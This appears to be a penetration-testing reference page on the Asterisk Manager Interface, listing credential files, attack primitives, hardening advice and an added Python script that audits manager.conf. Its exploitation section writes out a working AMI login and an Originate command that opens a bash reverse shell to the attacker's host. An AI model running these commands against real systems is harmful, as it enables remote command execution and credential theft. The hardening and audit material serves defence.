Asterisk AMI
aka Asterisk Manager Interface, AMI
Asterisk Manager Interface on 5038, a control socket whose credentials sit in cleartext config. With them, the Originate/System actions run shell commands as the asterisk user.
Ports
| Port | Proto | Notes |
|---|---|---|
| 5038 | tcp | Asterisk Manager Interface |
Fingerprint
- Banner: Asterisk Call Manager/<version>
- Often filtered externally; reachable post-foothold or via SSRF
Key files
| Path | Holds | Sensitive |
|---|---|---|
| /etc/asterisk/manager.conf | AMI usernames and secrets in cleartext | sensitive |
| /etc/asterisk/manager_additional.conf | additional AMI secrets | sensitive |
Default / weak creds
cleartext user/secret pairs from manager.conf
Service users
asterisk
Exploitation primitives
- Action: Login, then Action: Originate with Application: System (or Exec) runs a command as the asterisk user; Asterisk only allows these applications for accounts that hold the system write privilege
- Action: Command exposes the Asterisk CLI (requires the command privilege)
- Recovered AMI secrets are often reused elsewhere on the box
Overview
AMI is Asterisk’s management socket on 5038. Its credentials live in cleartext in manager.conf, and the protocol can originate a call into the dialplan that runs a system command, which is an RCE primitive as the asterisk user.
Exploitation
Open a raw socket to AMI:
exec 3<>/dev/tcp/<TARGET>/5038
Log in:
printf 'Action: Login\r\nUsername: admin\r\nSecret: <secret>\r\n\r\n' >&3
Originate a call that runs your command as asterisk:
printf 'Action: Originate\r\nChannel: Local/x@from-internal\r\nApplication: System\r\nData: bash -c "bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1"\r\n\r\n' >&3
Hardening
Bind AMI to localhost, give each user a strong unique secret with deny/permit ACLs, and grant only the read/write privilege classes a user actually needs, withholding originate, system and command where possible.
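The following audit script is an added example, not code from this page or from the Asterisk project. It parses a manager.conf (the INI-like format Asterisk uses, with `[section]` headers, `key = value` lines and `;` comments) and flags the weaknesses discussed above: AMI bound to a non-loopback address, accounts without a deny/permit ACL, short secrets, and write privileges that include originate, system, command or all. The two embedded configs are constructed samples, and the 12-character secret threshold is a hypothetical policy value rather than an Asterisk setting.

```python
"""Audit an Asterisk manager.conf for exposure and over-privileged AMI accounts.
Added example; not code from the page or the Asterisk project."""
import ipaddress
import re

# Write-privilege classes that let an AMI account reach a shell or the CLI.
DANGEROUS_WRITE = {"system", "command", "originate", "all"}
MIN_SECRET_LEN = 12  # hypothetical local policy, not an Asterisk option

# Constructed sample: an exposed AMI with one over-privileged account.
WEAK_CONF = """
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0

[admin]
secret = changeme          ; constructed weak secret
read = system,call,log,verbose,command,agent,user
write = system,call,log,verbose,command,agent,user,originate
"""

# Constructed sample: loopback-only AMI with a read-mostly monitoring account.
HARDENED_CONF = """
[general]
enabled = yes
port = 5038
bindaddr = 127.0.0.1

[monitor]
secret = Xk3!long-random-secret-here
deny = 0.0.0.0/0.0.0.0
permit = 127.0.0.1/255.255.255.255
read = call,log,reporting
write = reporting
"""


def parse_manager_conf(text):
    """Minimal parser: [section] headers, key=value or key=>value lines,
    ';' comments stripped, repeated keys (deny/permit) kept as lists."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        header = re.match(r"\[([^\]]+)\]", line)
        if header:
            current = header.group(1).split("(")[0].strip()  # drop template markers like (!)
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = re.split(r"=>|=", line, maxsplit=1)
        sections[current].setdefault(key.strip().lower(), []).append(value.strip())
    return sections


def _is_loopback(addr):
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def audit_manager_conf(text):
    """Return a list of human-readable findings; an empty list means nothing was flagged."""
    conf = parse_manager_conf(text)
    findings = []
    general = conf.get("general", {})
    enabled = general.get("enabled", ["no"])[-1].lower() in ("yes", "true", "1")
    if enabled:
        bind = general.get("bindaddr", ["0.0.0.0"])[-1]  # Asterisk defaults to all interfaces
        if not _is_loopback(bind):
            findings.append(f"general: AMI bound to {bind}, not loopback")
    for name, opts in conf.items():
        if name == "general" or "secret" not in opts:
            continue  # only sections with a secret are AMI accounts
        if len(opts["secret"][-1]) < MIN_SECRET_LEN:
            findings.append(f"{name}: secret shorter than {MIN_SECRET_LEN} characters")
        if "deny" not in opts:
            # Without a deny rule the ACL allows every source address by default.
            findings.append(f"{name}: no deny/permit ACL, any source address may log in")
        write = {c.strip().lower() for v in opts.get("write", []) for c in v.split(",")}
        risky = sorted(write & DANGEROUS_WRITE)
        if risky:
            findings.append(f"{name}: write privileges {','.join(risky)} allow command or CLI execution")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {label} ==")
        for finding in audit_manager_conf(conf) or ["no findings"]:
            print(" -", finding)
```

Point `audit_manager_conf` at the contents of a real /etc/asterisk/manager.conf (and manager_additional.conf, which uses the same format) to get the same report for a live box; the deny check deliberately looks for an explicit deny line, because Asterisk's ACL evaluation allows any address that matches no rule.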